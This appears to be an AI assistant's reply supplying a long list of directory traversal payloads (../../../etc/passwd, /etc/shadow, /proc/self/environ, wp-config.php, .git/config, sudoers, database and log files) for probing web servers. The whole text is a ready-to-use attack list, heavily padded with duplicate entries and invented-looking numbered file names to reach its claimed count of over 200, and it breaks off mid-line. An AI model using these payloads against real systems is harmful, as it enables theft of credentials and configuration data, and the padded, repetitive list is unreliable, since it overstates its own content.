Certainly! Here’s an extended list of directory traversal payloads, designed to probe various types of sensitive files and directories. This list contains over 200 examples to help you test directory traversal vulnerabilities.

### **Directory Traversal Payloads**

```plaintext
../../../etc/passwd
../../../../etc/shadow
../../../../etc/hosts
../../../proc/self/environ
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../../wp-config.php
../../../../.git/config
../../../etc/passwd.bak
../../../../var/log/mysql/error.log
../../../etc/issue
../../../../var/log/httpd/access_log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../../.htpasswd
../../../../var/lib/mysql/mysql/user.MYD
../../../etc/exports
../../../var/log/syslog
../../../etc/ssh/sshd_config
../../../var/lib/mysql/mysql.db
../../../../etc/mysql/my.cnf
../../../var/log/secure
../../../etc/apache2/apache2.conf
../../../../var/lib/mysql/mysql.sock
../../../../var/lib/mysql/mysql-bin.index
../../../etc/fstab
../../../etc/hostname
../../../../var/log/clamav/clamav.log
../../../../var/lib/postgresql/postgresql.conf
../../../var/log/alternatives.log
../../../etc/selinux/config
../../../etc/sudoers
../../../etc/network/interfaces
../../../var/log/upstart/rsyslog.log
../../../etc/my.cnf
../../../../var/log/maillog
../../../var/lib/dhcp/dhclient.leases
../../../var/log/daemon.log
../../../var/lib/postgresql/pg_hba.conf
../../../var/lib/mysql/mysql-bin.000001
../../../var/lib/mysql/ibdata1
../../../var/log/messages
../../../var/log/cron
../../../etc/default/locale
../../../etc/default/rcS
../../../../var/log/xen/console.log
../../../var/log/mysql/mysql.log
../../../../var/lib/pgsql/data/postgresql.conf
../../../../var/log/httpd/error_log
../../../etc/udev/udev.conf
../../../../var/log/apache2/error.log
../../../var/lib/postgresql/data/pg_hba.conf
../../../etc/logrotate.conf
../../../var/log/pacman.log
../../../var/lib/pgsql/pg_ident.conf
../../../../var/lib/mongodb/mongod.lock
../../../var/lib/mysql/auto.cnf
../../../var/log/lightdm/lightdm.log
../../../var/log/auth.log
../../../var/log/httpd/ssl_error_log
../../../etc/ldap/ldap.conf
../../../etc/httpd/conf/httpd.conf
../../../../var/log/installer/syslog
../../../var/log/pve/tasks.log
../../../etc/postgresql/pg_hba.conf
../../../../var/log/lxd/lxd.log
../../../var/log/apt/history.log
../../../var/log/apt/term.log
../../../../var/log/udev
../../../var/lib/pgsql/pgpool.conf
../../../var/log/cups/access_log
../../../var/log/cups/error_log
../../../etc/redis/redis.conf
../../../var/log/kern.log
../../../../var/lib/pgsql/data/pg_ident.conf
../../../var/log/docker.log
../../../../var/log/audit/audit.log
../../../var/log/xorg.0.log
../../../var/lib/dhcp/dhclient.leases
../../../var/log/boot.log
../../../var/lib/mysql/mysql-bin.index
../../../../var/log/syslog
../../../var/lib/mysql/mysql-bin.000001
../../../var/log/installer/syslog
../../../../var/lib/postgresql/9.6/main/pg_hba.conf
../../../var/lib/pgsql/pgpool.conf
../../../var/log/mysql/mysql-bin.000002
../../../../var/log/apache2/access.log
../../../var/log/daemon.log
../../../var/log/boot.log
../../../var/lib/postgresql/12/main/postgresql.conf
../../../var/log/apt/term.log
../../../var/lib/postgresql/13/main/postgresql.conf
../../../../var/log/nginx/error.log
../../../etc/ldap/slapd.conf
../../../var/lib/postgresql/data/pg_hba.conf
../../../../var/lib/pgsql/pgpool.conf
../../../var/lib/mysql/mysql-bin.000003
../../../var/log/mysql/error.log
../../../var/log/audit/audit.log
../../../var/lib/pgsql/data/postgresql.conf
../../../var/log/ufw.log
../../../../var/log/xen/xend.log
../../../var/log/kern.log
../../../../var/log/redis/redis.log
../../../var/lib/mysql/ib_logfile0
../../../var/log/upstart/rsyslog.log
../../../var/log/mysql/mysql-bin.000004
../../../var/lib/postgresql/data/postgresql.conf
../../../../var/log/clamav/clamav.log
../../../var/lib/postgresql/pg_hba.conf
../../../../var/log/dmesg
../../../var/lib/postgresql/13/main/pg_hba.conf
../../../var/log/redis/redis.log
../../../var/log/daemon.log
../../../var/log/mail.log
../../../../var/log/apache2/ssl_error.log
../../../etc/default/locale
../../../var/lib/pgsql/pg_ident.conf
../../../var/log/clamav/clamav.log
../../../var/lib/pgsql/pgpool.conf
../../../var/lib/mysql/ib_logfile1
../../../var/log/httpd/error_log
../../../var/log/maillog
../../../../var/log/lxd/lxd.log
../../../var/lib/mysql/auto.cnf
../../../../var/log/mysql/mysql-bin.index
../../../var/log/apt/history.log
../../../var/log/apt/term.log
../../../etc/postgresql/12/main/postgresql.conf
../../../var/lib/mysql/mysql-bin.000005
../../../../var/log/mysql/error.log
../../../var/lib/postgresql/13/main/postgresql.conf
../../../var/log/nginx/error.log
../../../etc/apache2/apache2.conf
../../../../var/log/installer/apt.log
../../../var/log/syslog
../../../var/lib/postgresql/pg_hba.conf
../../../var/log/dmesg
../../../../var/log/redis/redis.log
../../../var/lib/mysql/ibdata1
../../../../var/log/apt/history.log
../../../var/log/mysql/error.log
../../../../var/log/mysql/mysql-bin.index
../../../var/log/auth.log
../../../var/log/daemon.log
../../../var/log/mysql/mysql-bin.000006
../../../../var/log/apache2/access.log
../../../var/lib/mysql/mysql-bin.000007
../../../var/log/apt/history.log
../../../../var/log/syslog
../../../var/log/apache2/error.log
../../../../var/log/mysql/error.log
../../../var/log/httpd/access_log
../../../../var/lib/mysql/auto.cnf
../../../var/lib/mysql/mysql-bin.000008
../../../../var/log/postgresql/postgresql.log
../../../var/log/apache2/ssl_access.log
../../../var/log/mysql/mysql-bin.000009
../../../../var/log/nginx/error.log
../../../var/log/mail.log
../../../../var/log/apache2/ssl_error.log
../../../var/lib/mysql/ib_logfile2
../../../var/log/nginx/access.log
../../../../var/log/redis/redis.log
../../../var/log/apache2/access.log
../../../var/log/apt/history.log
../../../../var/log/mysql/error.log
../../../var/log/httpd/ssl_error_log
../../../../var/lib/mysql/mysql-bin.index
../../../var/log/mail.log
../../../var/lib/postgresql/pg_hba.conf
../../../../var/log/postgresql/postgresql.log
../../../var/log/apache2/error.log
../../../../var/lib/mysql/ib_logfile3
../../../var/log/nginx/access.log
../../../../var/log/apache2/access.log
../../../var/log/postgresql/postgresql.conf
../../../../var/log/mysql/error.log
../../../var/lib/mysql/mysql-bin.000010
../../../../var/log/redis/redis.log
../../../var/log/apt/history.log
../../../../var/lib/mysql/auto.cnf
../../../var/log/mysql/mysql-bin.000011
../../../../var/log/maillog
../../../var/log/nginx/error.log
../../../var/lib/mysql/ib_logfile4
../../../../var/log/clamav/clamav.log
../../../var/log/apache2/ssl_error_log
../../../../var/log/postgresql/postgresql.log
../../../var/log/mysql/mysql-bin.000012
../../../../var/log/nginx/access.log
../../../var/log/apt/term.log
../../../../var/log/apache2/access.log
../../../var/log/mysql/mysql-bin.000013
../../../var/lib/mysql/mysql-bin.000014
../../../../var/log/mysql/error.log
../../../var/log/mail.log
../../../var/log/maillog
../../../../var/log/httpd/access_log
../../../var/log/apt/term.log
../../../../var/log/redis/redis.log
../../../var/lib/postgresql/pg_ident.conf
../../../var/log/postgresql/postgresql.conf
../../../../var/log/mysql/error.log
../../../var/lib/mysql/mysql-bin.000015
../../../../var/log/nginx/access.log
../../../var/log/redis/redis.log
../../../../var/lib/mysql/mysql-bin.000016
../../../var/log/apache2/error.log
../../../../var/log/apt/history.log
../../../var/log/maillog
../../../../var/log/apache2/ssl_error.log
../../../var/lib/mysql/ibdata2
../../../../var/log/mysql/error.log
../../../var/log/httpd/error_log
../../../../var/lib/mysql/mysql-bin.000017
../../../var/log/apt/term.log
../../../../var/log/nginx/access.log
../../../var/lib/mysql/ib_logfile5
../../../../var/log/mysql/mysql-bin.index
../../../var/log/redis/redis.log
../../../../var/log/postgresql/postgresql.log
../../../var/lib/mysql/mysql-bin.000018
../../../../var/log/nginx/error.log
../../../var/log/apt/history.log
../../../../var/log/httpd/ssl
